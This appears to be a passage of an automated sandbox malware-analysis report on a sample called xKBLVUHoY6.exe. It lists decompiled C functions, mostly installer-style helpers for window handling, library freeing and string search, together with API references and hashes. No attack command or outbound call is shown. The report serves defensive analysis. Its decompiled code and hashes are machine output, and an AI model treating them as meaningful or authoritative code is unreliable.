                                                • GetFileAttributesW.KERNEL32(00425F10,00425F10,00425F10,00425F10,00425F10,00425F10,00000000,00425F10,00425F10,76CDFAA0,?,C:\Users\user\AppData\Local\Temp\,00405C33,?,76CDFAA0,C:\Users\user\AppData\Local\Temp\), ref: 00405F47
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405EDE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.752532009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.752517951.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752570246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752600293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752691816.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752707144.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752721715.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752738892.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752758445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd
                                                Similarity
                                                • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                • API String ID: 3248276644-3081826266
                                                • Opcode ID: 35502845658bd9c497c4a55af97ec41c1cd1fbb9e0c21b6c2721f1846b66cb6f
                                                • Instruction ID: 801aa802fb238c59ad0d4c26bfab73d63669863fdcce98965586ad3d6a32a901
                                                • Opcode Fuzzy Hash: 35502845658bd9c497c4a55af97ec41c1cd1fbb9e0c21b6c2721f1846b66cb6f
                                                • Instruction Fuzzy Hash: CCF0D135105D6226D622333A9C09AAF1508CF82364B5A053FBCD1B22D1DF3C8A53DDBE
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 89%
                                                			E004054DD(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                                				int _t15;
                                                				long _t16;
                                                
                                                				_t15 = _a8;
                                                				if(_t15 != 0x102) {
                                                					if(_t15 != 0x200) {
                                                						_t16 = _a16;
                                                						L7:
                                                						if(_t15 == 0x419 &&  *0x4236f4 != _t16) {
                                                							_push(_t16);
                                                							_push(6);
                                                							 *0x4236f4 = _t16;
                                                							E00404E9E();
                                                						}
                                                						L11:
                                                						return CallWindowProcW( *0x4236fc, _a4, _t15, _a12, _t16);
                                                					}
                                                					if(IsWindowVisible(_a4) == 0) {
                                                						L10:
                                                						_t16 = _a16;
                                                						goto L11;
                                                					}
                                                					_t16 = E00404E1E(_a4, 1);
                                                					_t15 = 0x419;
                                                					goto L7;
                                                				}
                                                				if(_a12 != 0x20) {
                                                					goto L10;
                                                				}
                                                				E004044AF(0x413);
                                                				return 0;
                                                			}





                                                0x004054e1
                                                0x004054eb
                                                0x00405507
                                                0x00405529
                                                0x0040552c
                                                0x00405532
                                                0x0040553c
                                                0x0040553d
                                                0x0040553f
                                                0x00405545
                                                0x00405545
                                                0x0040554f
                                                0x00000000
                                                0x0040555d
                                                0x00405514
                                                0x0040554c
                                                0x0040554c
                                                0x00000000
                                                0x0040554c
                                                0x00405520
                                                0x00405522
                                                0x00000000
                                                0x00405522
                                                0x004054f1
                                                0x00000000
                                                0x00000000
                                                0x004054f8
                                                0x00000000

                                                APIs
                                                • IsWindowVisible.USER32(?), ref: 0040550C
                                                • CallWindowProcW.USER32(?,?,?,?), ref: 0040555D
                                                  • Part of subcall function 004044AF: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044C1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.752532009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.752517951.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752570246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752600293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752691816.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752707144.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752721715.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752738892.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752758445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd
                                                Similarity
                                                • API ID: Window$CallMessageProcSendVisible
                                                • String ID:
                                                • API String ID: 3748168415-3916222277
                                                • Opcode ID: 97a082d88a1cb55e03e66ec7543f709465f1e5e5e36f808a355b04b1bc4c309f
                                                • Instruction ID: 896dd7550c11452a1c115f53988c63f353f89721b9370a05553ad38a214c3fb8
                                                • Opcode Fuzzy Hash: 97a082d88a1cb55e03e66ec7543f709465f1e5e5e36f808a355b04b1bc4c309f
                                                • Instruction Fuzzy Hash: 1601B171200609BFDF219F11DC81A6B3A27FB84354F100036FA01762D5C77A8E52DE5A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00403B21() {
                                                				void* _t2;
                                                				void* _t3;
                                                				void* _t6;
                                                				void* _t8;
                                                
                                                				_t8 =  *0x4216cc;
                                                				_t3 = E00403B06(_t2, 0);
                                                				if(_t8 != 0) {
                                                					do {
                                                						_t6 = _t8;
                                                						_t8 =  *_t8;
                                                						FreeLibrary( *(_t6 + 8));
                                                						_t3 = GlobalFree(_t6);
                                                					} while (_t8 != 0);
                                                				}
                                                				 *0x4216cc =  *0x4216cc & 0x00000000;
                                                				return _t3;
                                                			}







                                                0x00403b22
                                                0x00403b2a
                                                0x00403b31
                                                0x00403b34
                                                0x00403b34
                                                0x00403b36
                                                0x00403b3b
                                                0x00403b42
                                                0x00403b48
                                                0x00403b4c
                                                0x00403b4d
                                                0x00403b55

                                                APIs
                                                • FreeLibrary.KERNEL32(?,76CDFAA0,00000000,C:\Users\user\AppData\Local\Temp\,00403AF9,00403A28,?), ref: 00403B3B
                                                • GlobalFree.KERNEL32 ref: 00403B42
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00403B21
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.752532009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.752517951.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752570246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752600293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752691816.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752707144.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752721715.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752738892.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752758445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd
                                                Similarity
                                                • API ID: Free$GlobalLibrary
                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                • API String ID: 1100898210-3081826266
                                                • Opcode ID: 942278ec9c7e8339a206e332dc723704b636a129dd5b4a9861660f1353137a24
                                                • Instruction ID: 69a7d7bec05ee7f0f22c4a872385324a298b9ba4725761c8be5e054fe1390d88
                                                • Opcode Fuzzy Hash: 942278ec9c7e8339a206e332dc723704b636a129dd5b4a9861660f1353137a24
                                                • Instruction Fuzzy Hash: 25E0EC3750116097C6215F45EA08B5EBBB9AF54B26F09013AE9807B27187746C428B98
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 77%
                                                			E00405E22(WCHAR* _a4) {
                                                				WCHAR* _t5;
                                                				WCHAR* _t7;
                                                
                                                				_t7 = _a4;
                                                				_t5 =  &(_t7[lstrlenW(_t7)]);
                                                				while( *_t5 != 0x5c) {
                                                					_push(_t5);
                                                					_push(_t7);
                                                					_t5 = CharPrevW();
                                                					if(_t5 > _t7) {
                                                						continue;
                                                					}
                                                					break;
                                                				}
                                                				 *_t5 =  *_t5 & 0x00000000;
                                                				return  &(_t5[1]);
                                                			}





                                                0x00405e23
                                                0x00405e2d
                                                0x00405e30
                                                0x00405e36
                                                0x00405e37
                                                0x00405e38
                                                0x00405e40
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00405e40
                                                0x00405e42
                                                0x00405e4a

                                                APIs
                                                • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,004030E9,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\xKBLVUHoY6.exe,C:\Users\user\Desktop\xKBLVUHoY6.exe,80000000,00000003,?,?,?,?,?,00403847,?), ref: 00405E28
                                                • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,004030E9,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\xKBLVUHoY6.exe,C:\Users\user\Desktop\xKBLVUHoY6.exe,80000000,00000003), ref: 00405E38
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.752532009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.752517951.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752570246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752600293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752691816.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752707144.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752721715.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752738892.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752758445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd
                                                Similarity
                                                • API ID: CharPrevlstrlen
                                                • String ID: C:\Users\user\Desktop
                                                • API String ID: 2709904686-224404859
                                                • Opcode ID: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                                                • Instruction ID: b9880c769af8d41d832fb6ed8dc33ce50b4fd52cea508e3b62d11b70b6cf9f92
                                                • Opcode Fuzzy Hash: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                                                • Instruction Fuzzy Hash: 98D0A7B3410D20AEC3126B04EC04D9F73ACFF5130078A4427F581A71A4D7785D818EEC
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00405F5C(void* __ecx, CHAR* _a4, CHAR* _a8) {
                                                				int _v8;
                                                				int _t12;
                                                				int _t14;
                                                				int _t15;
                                                				CHAR* _t17;
                                                				CHAR* _t27;
                                                
                                                				_t12 = lstrlenA(_a8);
                                                				_t27 = _a4;
                                                				_v8 = _t12;
                                                				while(lstrlenA(_t27) >= _v8) {
                                                					_t14 = _v8;
                                                					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
                                                					_t15 = lstrcmpiA(_t27, _a8);
                                                					_t27[_v8] =  *(_t14 + _t27);
                                                					if(_t15 == 0) {
                                                						_t17 = _t27;
                                                					} else {
                                                						_t27 = CharNextA(_t27);
                                                						continue;
                                                					}
                                                					L5:
                                                					return _t17;
                                                				}
                                                				_t17 = 0;
                                                				goto L5;
                                                			}









                                                0x00405f6c
                                                0x00405f6e
                                                0x00405f71
                                                0x00405f9d
                                                0x00405f76
                                                0x00405f7f
                                                0x00405f84
                                                0x00405f8f
                                                0x00405f92
                                                0x00405fae
                                                0x00405f94
                                                0x00405f9b
                                                0x00000000
                                                0x00405f9b
                                                0x00405fa7
                                                0x00405fab
                                                0x00405fab
                                                0x00405fa5
                                                0x00000000

                                                APIs
                                                • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406241,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F6C
                                                • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,00406241,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F84
                                                • CharNextA.USER32(00000000,?,00000000,00406241,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F95
                                                • lstrlenA.KERNEL32(00000000,?,00000000,00406241,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F9E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.752532009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.752517951.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752570246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752600293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752691816.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752707144.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752721715.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752738892.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752758445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd
                                                Similarity
                                                • API ID: lstrlen$CharNextlstrcmpi
                                                • String ID:
                                                • API String ID: 190613189-0
                                                • Opcode ID: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                                • Instruction ID: 4f09c4eeff833ffafa08c7ff84761216a5ad6e9a06c03d1ebffd7ec4ed62f0c5
                                                • Opcode Fuzzy Hash: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                                • Instruction Fuzzy Hash: 53F06231505818FFD7029FA5DD04D9EBBA8EF06254B2540AAE940F7250D678DE019BA9
                                                Uniqueness

                                                Uniqueness Score: -1.00%